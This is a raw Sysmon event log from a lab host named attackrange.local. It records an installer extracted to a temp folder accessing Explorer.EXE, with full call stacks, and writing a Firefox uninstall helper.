DMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\uninstall\helper.exe2021-01-18 13:59:52.692 10341000x800000000000000015594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 